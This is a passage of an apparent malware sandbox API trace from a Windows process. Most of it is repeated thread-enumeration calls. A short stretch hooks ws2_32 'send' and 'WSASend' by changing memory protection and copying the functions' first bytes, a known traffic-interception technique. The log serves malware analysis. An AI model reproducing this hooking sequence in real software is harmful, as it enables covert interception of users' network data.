(hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.873] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.873] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.874] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.874] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.874] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.875] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.875] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.875] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.875] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.876] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.876] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.876] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.877] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.877] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.877] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.877] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.878] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.878] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.878] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.879] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.879] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.879] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.879] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.880] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.880] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.880] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.881] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.881] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.881] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.882] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.882] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.882] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.882] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.883] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.883] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.883] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.884] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.884] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.884] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.884] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.885] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.885] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.885] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.886] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.886] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.886] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.886] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.887] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.887] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.887] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.888] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.888] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.888] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.888] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.889] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.889] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.889] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.890] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.890] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.890] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.891] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.891] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.891] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.891] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.892] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.892] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.892] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.893] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.893] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.893] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.893] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.894] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.894] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.894] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.895] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.895] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.895] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.896] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.896] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.896] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.897] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.897] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.897] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.897] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.898] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.898] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.899] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.899] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.899] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.900] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.900] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.900] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.900] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.901] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.901] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.901] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.902] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.902] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.902] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.902] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0166.903] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.040] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.040] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.040] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.041] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.041] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.041] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.042] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.042] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.042] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.042] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.043] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.043] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.043] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.044] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.044] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.044] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.044] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.045] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.045] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.045] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.046] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.046] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.046] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.046] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.047] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.047] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.047] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.048] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.048] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.048] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.049] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.049] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.188] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x7fefe260000 [0167.189] GetProcAddress (hModule=0x7fefe260000, lpProcName="send") returned 0x7fefe268000 [0167.190] VirtualProtect (in: lpAddress=0x7fefe268000, dwSize=0xf, flNewProtect=0x40, lpflOldProtect=0x2095224 | out: lpflOldProtect=0x2095224*=0x20) returned 1 [0167.190] VirtualAlloc (lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20a0000 [0167.190] RtlMoveMemory (in: Destination=0x20a0000, Source=0x7fefe268000, Length=0xf | out: Destination=0x20a0000) [0167.191] VirtualProtect (in: lpAddress=0x7fefe268000, dwSize=0xf, flNewProtect=0x20, lpflOldProtect=0x2095224 | out: lpflOldProtect=0x2095224*=0x40) returned 1 [0167.488] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x7fefe260000 [0167.489] GetProcAddress (hModule=0x7fefe260000, lpProcName="WSASend") returned 0x7fefe2613b0 [0167.489] VirtualProtect (in: lpAddress=0x7fefe2613b0, dwSize=0xf, flNewProtect=0x40, lpflOldProtect=0x2095224 | out: lpflOldProtect=0x2095224*=0x20) returned 1 [0167.489] VirtualAlloc (lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20b0000 [0167.489] RtlMoveMemory (in: Destination=0x20b0000, Source=0x7fefe2613b0, Length=0xf | out: Destination=0x20b0000) [0167.490] VirtualProtect (in: lpAddress=0x7fefe2613b0, dwSize=0xf, flNewProtect=0x20, lpflOldProtect=0x2095224 | out: lpflOldProtect=0x2095224*=0x40) returned 1 [0167.496] GetCurrentProcessId () returned 0x4ac [0167.496] GetCurrentThreadId () returned 0xa08 [0167.496] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x1a4 [0167.499] Thread32First (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.499] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.499] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.500] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.500] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.500] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.501] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.501] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.501] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.502] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.502] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.502] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.502] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.503] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.503] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.503] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.504] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.504] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.504] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.504] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.505] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.505] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.505] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.506] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.506] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.507] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.507] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.507] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.508] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.508] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.508] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.508] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.509] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.509] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.509] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.510] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.510] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.510] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.511] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.511] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.511] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.512] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.512] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.512] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.513] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.513] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.513] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.513] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.514] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.514] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.514] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.515] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.515] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.515] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.516] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.516] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.516] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.516] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.517] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.517] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.517] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.518] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.609] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.609] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.609] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.609] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.610] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.610] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.610] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.611] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.611] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.611] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.612] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.612] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.612] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.613] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.613] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.613] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.614] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.614] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.614] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.614] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.615] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.630] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.630] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.631] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.631] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.631] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.632] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.632] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.632] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.633] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.633] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.633] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.633] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.634] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.634] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.634] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.635] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.635] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.635] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.636] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.636] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.636] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.637] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.637] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.637] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.638] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.638] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.638] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.638] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.639] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.639] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.639] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.640] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.640] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.640] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.641] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.641] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.641] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.641] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.642] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.642] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.642] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.643] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.643] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.643] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.643] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.644] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.644] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.644] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.645] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.645] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.645] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.646] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.646] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.646] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.646] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.647] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.647] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.647] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.648] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.648] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.648] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.649] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.649] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.649] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.649] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.650] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.650] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.650] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.651] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.651] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.651] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.652] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.652] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.652] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.652] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.653] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.653] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.653] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.654] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.654] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.654] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.655] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.655] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.655] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.655] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.656] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.656] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.834] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.834] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.834] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.835] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.835] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.835] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.835] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.836] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.836] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.836] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.837] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.837] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.837] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.837] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.838] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.838] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.838] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.838] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.839] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.839] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.839] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.840] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.840] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.840] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.841] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.841] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.841] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.842] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.842] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.842] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.843] Thread32Next (hSnapshot=0x1a4, lpte=0x290fe60) returned 1 [0167.843] Thread32Next 